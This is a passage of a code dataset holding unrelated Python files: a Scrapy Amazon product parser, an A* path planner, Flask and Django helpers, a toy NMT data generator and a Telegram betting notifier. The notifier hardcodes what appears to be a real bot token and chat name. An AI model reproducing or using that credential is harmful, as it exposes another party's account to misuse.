emp.name\nemp.myinfo()","sub_path":"delete_object_properties.py","file_name":"delete_object_properties.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"28241251","text":"\"\"\"\nProgrammatically create a file in text format and write to it, line by line, the data\nentered by the user.\nAn empty line signals the end of data entry.\n\"\"\"\n\nif __name__ == \"__main__\":\n try:\n print(\"Enter data line by line.\\n\"\n \"To finish entering data, enter an empty line.\")\n with open(\"Homework#5.1.txt\", \"w\") as file:\n while True:\n temp_line = input()\n if temp_line:\n file.write(f\"{temp_line}\\n\")\n else:\n break\n except IOError as e:\n print(f\"An input/output error occurred:\\n{e}:\")\n","sub_path":"Урок 5. Работа с файлами/Homework#5.1/Homework#5.1.py","file_name":"Homework#5.1.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"257123504","text":"import pytz\n\nfrom flask import render_template\n\nfrom standardweb.tasks import send_rts_data as send_rts_data_task\n\n\ndef new_message(user, message):\n message_row_html = render_template(\n 'messages/includes/message_row.html',\n user=user,\n message=message\n )\n\n payload = {\n 'date': message.sent_at.replace(tzinfo=pytz.UTC).isoformat(),\n 'message_row_html': message_row_html,\n 'from_user_id': message.from_user_id\n }\n\n send_rts_data(message.to_user_id, 'messages', 'new', payload)\n\n\ndef unread_message_count(user):\n payload = {\n 'count': user.get_unread_message_count()\n }\n\n send_rts_data(user.id, 'messages', 'unread-count', payload)\n\n\ndef send_rts_data(user_id, channel, action, payload):\n send_rts_data_task.apply_async((\n user_id,\n channel,\n action,\n payload\n ))\n","sub_path":"standardweb/lib/realtime.py","file_name":"realtime.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"297440349","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.loader import ItemLoader\nfrom amazon_product_page_parser.items import Product\nimport sys\nimport logging\nfrom datetime import datetime\nimport os\nimport esprima \nimport json\nfrom time import sleep\n\nclass ProductPageParserSpider(scrapy.Spider):\n name = 'product_page_parser_desktop'\n allowed_domains = ['amazon.in']\n exchange = 'jobs'\n\n @classmethod \n def from_crawler(cls, crawler, *args, **kwargs):\n # super(ProductPageParserSpider, cls).from_crawler(crawler, *args, **kwargs)\n return cls(\n bot_name=crawler.settings.get('BOT_NAME'),\n *args,\n **kwargs\n )\n\n def __init__(self, bot_name, seeds=None, task_id=None, pipeline_id=None, source_url=None, crawl_time=None, reprocessed=False, *args, **kwargs):\n super(ProductPageParserSpider, self).__init__(*args, **kwargs)\n if seeds is None or task_id is None:\n sys.exit(0)\n \n if pipeline_id is None:\n sys.exit(0)\n\n self.task_id = task_id\n self.job_id = kwargs['_job']\n self.pipeline_id = pipeline_id\n self.seeds = seeds.split('|')\n self.source_url = source_url\n self.bot_name = bot_name\n self.crawl_time = crawl_time\n self.reprocessed = bool(reprocessed)\n self.__configure_logger()\n logging.getLogger('pika').setLevel(logging.WARN)\n\n def __configure_logger(self):\n \n logger = logging.getLogger(self.name)\n \n folder_path = f'/scrapyd/logs-internal/{self.bot_name}/{self.name}/'\n if not 
os.path.exists(folder_path):\n os.makedirs(folder_path)\n # Create handlers\n c_handler = logging.StreamHandler()\n f_handler = logging.FileHandler(f'{folder_path}/{self.pipeline_id}.log')\n c_handler.setLevel(logging.WARNING)\n f_handler.setLevel(logging.INFO)\n\n # Create formatters and add it to handlers\n c_format = logging.Formatter('%(name)s - %(levelname)s - %(message)s')\n f_format = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n c_handler.setFormatter(c_format)\n f_handler.setFormatter(f_format)\n\n # Add handlers to the logger\n logger.addHandler(c_handler)\n logger.addHandler(f_handler)\n \n def start_requests(self):\n for seed in self.seeds:\n yield scrapy.Request(seed, callback=self.parse)\n\n def parse(self, response):\n if self.check_blocked(response):\n return\n product = ItemLoader(item=Product(), response=response)\n asin_info = self.__get_asin_info(response)\n\n canonical_link = response.xpath('//*[@rel=\"canonical\"]/@href').get()\n asin = os.path.basename(canonical_link) or \"Not_Found\"\n product.add_value('asin', asin)\n product.add_value('parent_asin', asin_info['parent'])\n product.add_value('children_asin', asin_info['children'])\n product.add_xpath('title', '//span[@id=\"productTitle\"]/text()')\n product.add_xpath('manufacturer', '//a[@id=\"bylineInfo\"]/text()')\n product.add_xpath('rating', '//div[@id=\"averageCustomerReviews\"]//span[@id=\"acrPopover\"]/@title')\n product.add_xpath('rating_count', '//div[@id=\"averageCustomerReviews\"]//span[@id=\"acrCustomerReviewText\"]/text()[normalize-space(.)]')\n product.add_xpath('answered_questions', '//a[@id=\"askATFLink\"]/span/text()[normalize-space(.)]')\n product.add_xpath('promote', '//div[@data-feature-name=\"acBadge\"]//span//text()[normalize-space(.)]')\n product.add_xpath('mrp', '//*[@id=\"price\"]/table/tbody/tr[1]/td[2]/span[1]/text()')\n product.add_xpath('price', '//*[@id=\"priceblock_ourprice\" or @id=\"priceblock_dealprice\"]//text()')\n product.add_xpath('categories', '//*[@id=\"wayfinding-breadcrumbs_container\"]//li[not(contains(@class, \"a-breadcrumb-divider\"))]/span//text()')\n if response.css('.fbaBadge'):\n product.add_value('fba', True)\n \n offers = []\n print(response.css('.sopp-offer-enumerator').xpath('following-sibling::div'))\n for offer in response.css('.sopp-offer-enumerator').xpath('./following-sibling::div'):\n name = offer.xpath('.//*[@aria-hidden=\"true\"]').css('.sopp-offer-title').xpath('.//text()').get()\n description = offer.xpath('.//*[@aria-hidden=\"true\"]').css('.description').xpath('.//text()').extract()\n if not name == None:\n offers.append(\n {\n name: ''.join(description)\n }\n )\n product.add_value('offers', offers)\n # product.add_xpath('offers', '//*[@class=\"sopp-offer-title\"]/../span/text()[normalize-space(.)]')\n product.add_xpath('extra_features', '//*[@id=\"icon-farm-container\"]/div/div/div[2]//text()[normalize-space(.)]')\n product.add_xpath('expiry_date', '//*[@data-feature-name=\"expiryDate\"]//text()')\n product.add_xpath('availability', '//*[@id=\"availability\"]//text()')\n product.add_xpath('merchant_info', '//*[@id=\"merchant-info\"]//text()')\n product.add_xpath('olp', '//*[@data-feature-name=\"olp\"]//text()')\n styles = []\n index = 0\n for style in response.xpath('//*[@data-feature-name=\"twister\"]//ul/li'):\n name = style.xpath('./@title').get()\n asin = style.xpath('./@data-defaultasin').get()\n price = style.xpath(f'.//*[@id=\"style_name_{index}_price\" or @id=\"pattern_name_{index}_price\"]/span/text()').get()\n 
style_item = {\n \"name\": name,\n \"asin\": asin,\n \"price\": price\n }\n\n styles.append(style_item)\n index += 1\n product.add_value('styles', styles)\n product.add_xpath('design', '//*[@id=\"variation_pattern_name\"]/div/span/text()')\n product.add_xpath('features', '//*[@data-feature-name=\"featurebullets\"]//ul/li//text()')\n bsr_selector = response.xpath(\"//*[@id='SalesRank']//text()[not(parent::style)][normalize-space(.)]\")\n \n if bsr_selector:\n bsr = bsr_selector.getall()\n else:\n bsr_selector = response.xpath(\"//*[contains(@href,'/gp/bestsellers/')]/ancestor-or-self::*[(contains(.,'Rank') or contains(., 'rank')) and (contains(.,'sellers') or contains(.,'Sellers'))][1]\")\n bsr = bsr_selector[-1].xpath('.//text()[not(parent::style)][not(parent::noscript)][not(parent::script)]').getall()\n\n bsr = \"NOT_FOUND\" if bsr=='' or bsr is None or (len(bsr)>256)else bsr\n dfa_selector = response.xpath(\"//*[contains(., 'Date First Available')]\")\n if dfa_selector and len(dfa_selector) > 0:\n dfa = dfa_selector[-1].xpath('./..//text()[not(parent::style)][not(parent::noscript)][not(parent::script)]').getall()\n else:\n dfa = None\n dfa = \"NOT_FOUND\" if dfa=='' or dfa is None or (len(dfa)>256)else dfa\n # product.add_xpath('bsr', '//*[@id=\"SalesRank\"]//text()[not(parent::style)][normalize-space(.)]')\n # product.add_xpath('bsr', \"//a[contains(@href, '/gp/bestsellers/')]/../../*[contains(.//text(), 'in')][contains(.//text(), '#')]//text()\")\n # self.logger.info(bsr[-1].xpath('string(.//text())').getall())\n # product.add_xpath('bsr', \"//*[contains(@href,'/gp/bestsellers/')]/ancestor-or-self::*[(contains(.,'Rank') or contains(., 'rank')) and (contains(.,'sellers') or contains(.,'Sellers'))][1]//text()\")\n product.add_value('bsr', bsr)\n product.add_value('dfa', dfa)\n product.add_xpath('description', '//*[@id=\"productDescription\"]/p//text()')\n product.add_xpath('aplus_images', '//*[@id=\"aplus\"]//img/@src[not(contains(., \"gif\"))]')\n product.add_xpath('aplus_text', '//*[@id=\"aplus\"]//*[not(self::style)][not(self::noscript)][not(self::script)]/text()')\n customer_reviews = response.xpath('//*[@id=\"reviewsMedley\"]')\n\n star_ratings = {}\n print(response.xpath('//*[@id=\"reviewsMedley\"]//table[@id=\"histogramTable\"]'))\n for star_rating in customer_reviews.xpath('.//table[@id=\"histogramTable\"]//tr'):\n star = star_rating.xpath('./td[1]//a/text()[normalize-space(.)]').get()\n percentage = star_rating.xpath('./td[3]//a/text()[normalize-space(.)]').get()\n star_ratings[star] = percentage\n print(star_ratings)\n product.add_value('star_ratings', star_ratings)\n\n cr_summary = {}\n for summary in customer_reviews.xpath('//*[@id=\"cr-summarization-attributes-list\"]/div'):\n pivot = summary.xpath('.//i')\n attribute = pivot.xpath('./../preceding-sibling::*//span/text()').get()\n rating = pivot.xpath('./span/text()').get()\n cr_summary[attribute] = rating\n product.add_value('cr_summary', cr_summary)\n product.add_value('parse_time', {\"$date\": datetime.now().isoformat()})\n product.add_value('crawl_time', {\"$date\": datetime.fromisoformat(self.crawl_time).isoformat()})\n product.add_value('reprocessed', self.reprocessed)\n product.add_value('url', response.request.url)\n product.add_value('source_url', self.source_url)\n product.add_value('pipeline_id', self.pipeline_id)\n\n yield product.load_item()\n\n def __get_asin_info(self, response):\n parent_asin = None\n children = None\n try:\n\n js = 
response.xpath('//script[@type=\"text/javascript\"][contains(.,\"parentAsin\")]//text()').get()\n parsed_program = esprima.parseScript(js)\n # prased_program.body\n # print(prased_program)\n # json.dump('parsed_js', prased_program)\n properties = parsed_program.toDict().get('body')[0].get('expression').get('arguments')[-1].get(\"body\").get('body')[0].get('declarations')[0].get(\"init\").get('properties')\n # print(properties)\n for prop in properties:\n if prop.get(\"type\") == \"Property\" and prop.get('key').get('value') == \"parentAsin\":\n parent_asin = prop.get('value').get('value')\n if prop.get(\"type\") == \"Property\" and prop.get('key').get('value') == \"dimensionToAsinMap\":\n children_props = prop.get('value').get('properties')\n children = map(lambda child: child.get('value').get('value'), children_props)\n\n except Exception as err:\n self.logger.error(f\"An exception occurred {err}\")\n asin_info = {\n 'parent': parent_asin,\n 'children': children\n } \n print(asin_info)\n return asin_info \n # with open('parsed_js.js', 'w') as js_file:\n # js_file.writelines(json.dumps(parsed_program.toDict(), indent=2))\n\n def check_blocked(self, response):\n page_title = response.xpath('//title/text()').get()\n if page_title == \"Robot Check\":\n print(\n \"******************Blocked by Amazon**********************\")\n return True\n return False\n","sub_path":"amazon-product-page-parser/amazon-product-page-parser/amazon_product_page_parser/spiders/product_page_parser.py","file_name":"product_page_parser.py","file_ext":"py","file_size_in_byte":11087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"460659194","text":"from django.core.management.base import BaseCommand\nfrom elasticsearch_dsl import connections\nfrom api import models, settings\nfrom search.documents import Podcast\n\n\nclass Command(BaseCommand):\n help = 'Reindex all podcasts'\n\n def handle(self, *args, **options):\n self.reindex_podcasts()\n\n def reindex_podcasts(self, start_date=None):\n connections.create_connection(alias='default', hosts=[f'{settings.ELASTIC_HOST}'], timeout=20)\n Podcast._index.delete()\n print('Deleted podcast index.')\n if start_date:\n podcasts = models.Podcast.objects.filter(cdate__gte=start_date)\n else:\n podcasts = models.Podcast.objects.all()\n for podcast in podcasts:\n p = Podcast(**podcast.to_dict())\n p.save()\n print('Finished indexing all podcasts.')\n","sub_path":"api/management/commands/delete_and_index_podcasts.py","file_name":"delete_and_index_podcasts.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"30311811","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport math\nimport sys\nimport pygame\nimport numpy as np\n\n\n\n# In[2]:\n\n\n# - - Initial Node - -\nprint(\"Enter robot parameters\")\nrad=float(input(\"radius = \"))\nclr=float(input(\"clearence = \"))\n\nprint(\"Enter initial node cordinates\")\nxi=float(input(\"x = \"))\nyi=float(input(\"y = \"))\nndi=[xi,yi]\nprint(\"Enter goal node cordinates\")\nxg=float(input(\"x = \"))\nyg=float(input(\"y = \"))\ngoal=[xg,yg]\nr=int(input(\"Enter Resolution (must be an integer value) = \"))\n\ngoal= [n / r for n in goal]\nndi=[m / r for m in ndi]\n\nrows=150/r\ncoloums=250/r\n\n\n# In[3]:\n\n\ndef heu(node):\n h = math.sqrt ( (node[0] - goal[0])**2 + (node[1] - goal[1])**2 )\n return h\n\n\n# In[4]:\n\n\ndef left(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]-1\n 
n_nd[1]=ct_nd[1]\n cost=1\n return n_nd,cost\n\ndef right(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]+1\n n_nd[1]=ct_nd[1]\n cost=1\n return n_nd,cost\n\ndef down(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]\n n_nd[1]=ct_nd[1]+1\n cost=1\n return n_nd,cost\n\ndef up(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]\n n_nd[1]=ct_nd[1]-1\n cost=1\n return n_nd,cost\n\ndef down_left(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]-1\n n_nd[1]=ct_nd[1]+1\n cost=1.42\n return n_nd,cost\n\ndef up_left(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]-1\n n_nd[1]=ct_nd[1]-1\n cost=1.42\n return n_nd,cost\n \ndef up_right(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]+1\n n_nd[1]=ct_nd[1]-1\n cost=1.42\n return n_nd,cost\n \ndef down_right(ct_nd):\n n_nd=[0,0]\n n_nd[0]=ct_nd[0]+1\n n_nd[1]=ct_nd[1]+1\n cost=1.42\n return n_nd,cost\n\ndef obstacle_space_disp(x,y,r):\n c = 0\n if ((x-math.ceil(190/r))**2+math.ceil(y-(130/r))**2-math.ceil(15/r)**2)<=0:\n c=1\n if (2*x + 19*y - 1314/r <= 0) and (41*x+ 25*y -6525/r >= 0) and (y - 15/r>= 0) and (37*x +10*y - 6551/r <= 0):\n c=1\n if (38*x- 7*y - 5830/r >= 0) and (38*x + 23*y - 8530/r <= 0) and (37*x -20*y -6101/r <= 0) and (37*x +10*y - 6551/r >= 0):\n c=1\n if (x-math.floor(50/r) >= 0) and (x - math.floor(100/r) <= 0) and (y - math.floor(67.5/r) >= 0) and (y - math.floor(112.5/r) <= 0):\n c=1\n if ((x-math.ceil(140/r))/math.ceil(15/r))**2 + ((y - math.ceil(120/r))/math.ceil(6/r))**2 - 1 <=0:\n c=1\n return c\n\ndef obstacle_space(x,y,r,d=rad+clr):\n line1=(6525.0/25) - d*math.sqrt((-41.0/25)**2+1)\n line2=d*math.sqrt((-2.0/19)**2+1)+(1314.0/19)\n line3=d*math.sqrt((38.0/7)**2+1)-(5830.0/7)\n line4=(6101.0/20)-d*math.sqrt((37.0/20)**2+1)\n line5= d*math.sqrt((-38.0/23)**2+1) + (8530.0/23)\n line6l= (6551.0/10)- d*math.sqrt((-37.0/10)**2+1)\n line6r= d*math.sqrt((-37.0/10)**2+1) +(6551.0/10)\n q = 0\n if (x<(d/r))or (x>(250-d)/r) or (y<(d/r)) or (y>(150-d)/r):\n q=1\n if ((x-math.ceil(190/r))**2+(y-math.ceil(130/r))**2-(math.ceil((15+d)/r))**2)<0:\n q=1\n if ((2.0/19)*x + y - line2/r < 0) and (y+(41.0/25)*x -line1/r > 0) and (y - ((15-d)/r)> 0) and (y<(-37.0/10)*x+line6r/r):\n q=1\n if ((-38.0/7)*x +y - line3/r < 0) and ((38.0/23)*x + y - line5/r < 0) and ((-37.0/20)*x +y +line4/r > 0) and (y>(-37.0/10)*x+line6l/r):\n q=1\n if (x-math.floor((50-d)/r) > 0) and (x - math.floor((100+d)/r) < 0) and (y - math.floor((67.5-d)/r) > 0) and (y - math.floor((112.5+d)/r) < 0):\n q=1\n if ((x-math.ceil(140/r))/(math.ceil(15+d)/r))**2 + ((y - math.ceil(120/r))/(math.ceil(6+d)/r))**2 - 1 < 0:\n q=1\n return q\n\n# In[5]:\n\n\np_nd=[ndi]\nc_nd=[ndi]\nh_nd=[round(heu(ndi),2)]\nvp_nd=[]\nvc_nd=[]\nv_cst=[]\nvh_nd=[]\n\n\nif (obstacle_space(goal[0],goal[1],r)==1 or obstacle_space(ndi[0],ndi[1],r)):\n sys.exit(\"Either goal node or start node lies inside obstacle or outside the workspace\")\n\nif (ndi[0] not in range(0,251) or goal[0] not in range(0,251) or ndi[1] not in range(0,151) or goal[1] not in range(0,151)):\n sys.exit(\"Entered node cordinates are not integers or outside the workspace or invalid resolution\")\n\n\n# In[6]:\n\n\n\nx=0\ncst=[0]\nndx=ndi\nflag=0\nexit=0\ncount=0\nwhile(flag!=1 and c_nd!=[]):\n \n #--- UP Command ---\n nd,cost=up(ndx)\n if (nd[1]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n 
h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n \n #--- DOWN Command ---\n nd,cost=down(ndx)\n if (nd[1]<=rows and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n \n #--- LEFT Command ---\n nd,cost=left(ndx)\n if (nd[0]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n #--- RIGHT Command ---\n nd,cost=right(ndx)\n if (nd[0]<=coloums and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n \n #--- UP LEFT Command ---\n nd,cost=up_left(ndx)\n if (nd[1]>=0 and nd[0]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n \n #--- UP RIGHT Command ---\n nd,cost=up_right(ndx)\n if (nd[0]<=coloums and nd[1]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n \n #--- DOWN LEFT Command ---\n nd,cost=down_left(ndx)\n if (nd[1]<=rows and nd[0]>=0 and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n\n \n #--- DOWN RIGHT Command ---\n nd,cost=down_right(ndx)\n if (nd[1]<=rows and nd[0]<=coloums and obstacle_space(nd[0],nd[1],r)!=1):\n if nd not in vc_nd:\n xl=range(0,len(c_nd))\n xl=xl[::-1]\n check=0\n for cku in xl:\n if(nd == c_nd[cku]):\n check=1\n if(cst[cku]>=(cst[x]+cost)):\n p_nd[cku]=ndx\n cst[cku]=round((cst[x]+cost),1)\n break\n \n \n if (check!=1):\n p_nd.append(ndx)\n c_nd.append(nd)\n cst.append(round((cost+cst[x]),1))\n h_nd.append(round((cost+cst[x]+heu(nd)),2))\n \n vp_nd.append(p_nd.pop(x))\n vc_nd.append(c_nd.pop(x))\n v_cst.append(cst.pop(x))\n vh_nd.append(h_nd.pop(x))\n \n if(vc_nd[-1]==goal):\n flag=1\n \n if(flag!=1 and c_nd!=[]):\n x=h_nd.index(min(h_nd))\n 
ndx=c_nd[x][:]\n \nif(flag==0 and c_nd==[]): # Only this if statement was added after the late submission \n sys.exit(\"Path not found\")\n \n\n\nseq=[]\nseq.append(vc_nd[-1])\nseq.append(vp_nd[-1])\nx=vp_nd[-1]\ni=1\nwhile(x!=ndi):\n if(vc_nd[-i]==x):\n seq.append(vp_nd[-i])\n x=vp_nd[-i]\n i=i+1 \n\n\n\n\n\n\n# In[8]:\n\n\nobs_space = []\nfor i in range(0,251):\n for j in range(0,151):\n q=obstacle_space_disp(i,j,r)\n if q == 1:\n obs_space.append([i,j])\n\nk=2\nmy_list = np.array(vc_nd)\nvc_nd=my_list*k*r\nmy_list1 = np.array(seq)\nseq=my_list1*k*r\nmy_list2 = np.array(obs_space)\nobs_space = my_list2*k*r\n\n\npygame.init()\n\n#Defining the colors\nBlack = [0, 0, 0]\nred = [255, 0, 0]\nBlue = [0, 100, 255]\nWhite = [255, 255, 255]\n\n#Height and Width of Display\nSIZE = [250*k+r+r, 150*k+r+r]\nscreen = pygame.display.set_mode(SIZE)\n\npygame.display.set_caption(\"OUTPUT\")\nclock = pygame.time.Clock()\ndone = False\nwhile not done:\n for event in pygame.event.get(): \n if event.type == pygame.QUIT: \n done = True \n \n screen.fill(Black)\n#Printing the obstacles\n for i in obs_space:\n pygame.draw.rect(screen, Blue, [i[0],150*k-i[1],r*k,r*k])\n pygame.display.flip()\n clock.tick(20)\n#Printing the visited nodes\n for i in vc_nd:\n pygame.time.wait(1)\n pygame.draw.rect(screen, White, [i[0],150*k-i[1],r*k,r*k])\n pygame.display.flip()\n#Printing the path\n for j in seq[::-1]:\n pygame.time.wait(1)\n pygame.draw.rect(screen, red, [j[0], 150*k-j[1], r*k,r*k])\n pygame.display.flip()\n pygame.display.flip()\n\n pygame.time.wait(1500)\n done = True\npygame.quit()\n\n\n\n","sub_path":"ASTAR_RIGID.py","file_name":"ASTAR_RIGID.py","file_ext":"py","file_size_in_byte":11978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"538152558","text":"import string\nimport sys\nimport random\nimport numpy as np\n\norig_stdout=sys.stdout\n\nn=15\nnum=10\nS=np.zeros(num)\nB=np.zeros(num)\n\nf1=open(\"vocab.src\",\"w+\")\nf2=open(\"vocab.tgt\",\"w+\")\nf3=open(\"train.src\",\"w+\")\nf4=open(\"train.tgt\",\"w+\")\nf5=open(\"dev.src\",\"w+\")\nf6=open(\"dev.tgt\",\"w+\")\nf7=open(\"test.src\",\"w+\")\nf8=open(\"test.tgt\",\"w+\")\n\nf1.write(\"\\n\\n\\n\")\nf2.write(\"\\n\\n\\n\")\n\nfor i in range(11,21):\n\tS[i-11]=i\n\tf1.write(str(i)+\"\\n\")\n\tf2.write(str(i)+\"\\n\")\nfor i in range(21,31):\n\tB[i-21]=i\n\tf1.write(str(i)+\"\\n\")\ninput_string=np.zeros(n)\npos=np.arange(n)\n\nfor s in range(1000):\n\tinput_string=np.zeros(n)\n\tk=random.randint(1,n/3)\n\tselected_char=np.random.choice(S,k,replace=False)\n\tselected_pos=np.random.choice(pos,k,replace=False)\n\t# print \"selected chars are \",selected_char\n\t# print \"selected pos are \",selected_pos\n\tfor i in range(k):\n\t\tinput_string[selected_pos[i]]=selected_char[i]\n\tfor i in range(n):\n\t\t#np.random.seed(i)\n\t\tif (int(input_string[i])==0):\n\t\t\tinput_string[i]=np.random.choice(B,1,replace=False)[0]\n\n\toutput_string=np.zeros(k)\n\tfor i in range(k):\n\t\toutput_string[i]=selected_char[i]\n\ttemp2=sorted(output_string)\n\t# print \"input \",input_string\n\t# print \"output \",temp2 \n\tif(s<900):\n\t\tfor j in range(len(input_string)):\n\t\t\tf3.write(str(int(input_string[j]))+\" \")\n\t\tf3.write(\"\\n\")\n\t\tfor j in range(len(temp2)):\n\t\t\tf4.write(str(int(temp2[j]))+\" \")\n\t\tf4.write(\"\\n\")\n\telif(s<950):\n\t\tfor j in range(len(input_string)):\n\t\t\tf5.write(str(int(input_string[j]))+\" \")\n\t\tf5.write(\"\\n\")\n\t\tfor j in 
range(len(temp2)):\n\t\t\tf6.write(str(int(temp2[j]))+\" \")\n\t\tf6.write(\"\\n\")\n\telse:\n\t\tfor j in range(len(input_string)):\n\t\t\tf7.write(str(int(input_string[j]))+\" \")\n\t\tf7.write(\"\\n\")\n\t\tfor j in range(len(temp2)):\n\t\t\tf8.write(str(int(temp2[j]))+\" \")\n\t\tf8.write(\"\\n\")","sub_path":"nmt/nmt_data/simple data/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"149481605","text":"import requests\n\n\ndef notify(name, home, guest, winner):\n \"\"\"Use this function to send notifications via TG bot\n \"\"\"\n\n # Selecting the bot & chat \n bot_token = '739094059:AAFTJOeh61nstCgedtXx-oZqj1oWfgQGlwk'\n bot_chatID = \"@AlmanacBets\"\n\n # Sending bot a message\n send_text = 'https://api.telegram.org/bot' + \\\n bot_token + '/sendMessage?chat_id=' + bot_chatID + \\\n '&parse_mode=Markdown&text=' + '№4\\nБаскетбол' + '\\n' + name + '\\n' + \\\n home + ' - ' + guest + '\\n' + '2 четверть ' + winner\n requests.get(send_text)\n","sub_path":"notificator.py","file_name":"notificator.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"469872346","text":"from django.core.management.base import BaseCommand, CommandError\nfrom pyorg.models import Io\n\nclass Command(BaseCommand):\n help = 'Tests out the thing im testing'\n\n def add_arguments(self, parser):\n parser.add_argument('--test', nargs='+', type=int)\n\n def handle(self, *args, **options):\n test = options[\"test\"]\n if test:\n for t in options['test']:\n try:\n print(str(t)+\" was an arg\")\n \t\n except Exception as e:\n raise CommandError('test \"%s\" does not exist' % t)\n else:\n print(\"shoot\")\n print('ran cmd')\n","sub_path":"task/pyorg/management/commands/gettasks.py","file_name":"gettasks.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"218542681","text":"from crawler.spiders import BaseSpider\nimport scrapy\nfrom utils.util_old import *\nfrom crawler.items import *\nfrom bs4 import BeautifulSoup as bs\nfrom scrapy.http import Request, Response\nimport re\nimport time\n\nclass KickerdailySpider(BaseSpider):\n name = 'kickerdaily'\n allowed_domains = ['kickerdaily.com']\n start_urls = [#'http://kickerdaily.com/',\n 'https://kickerdaily.com/posts/category/tagalog/',\n 'https://kickerdaily.com/posts/category/philippines/',\n 'https://kickerdaily.com/posts/category/world/',\n 'https://kickerdaily.com/posts/category/entertainment-world/',\n 'https://kickerdaily.com/posts/category/social-news/']\n website_id = 496\n language_id = 1880\n sql = { # sql配置\n 'host': '192.168.235.162',\n 'user': 'dg_admin',\n 'password': 'dg_admin',\n 'db': 'dg_crawler'\n }\n\n \n \n \n\n def parse(self, response):\n meta = {}\n soup = bs(response.text,\"html.parser\")\n category1 = soup.find(\"h1\",class_=\"page-title\").text.strip()\n meta[\"category1\"] = category1\n meta[\"category2\"] = None\n url_list = soup.select(\"#main-content > article\")\n for h 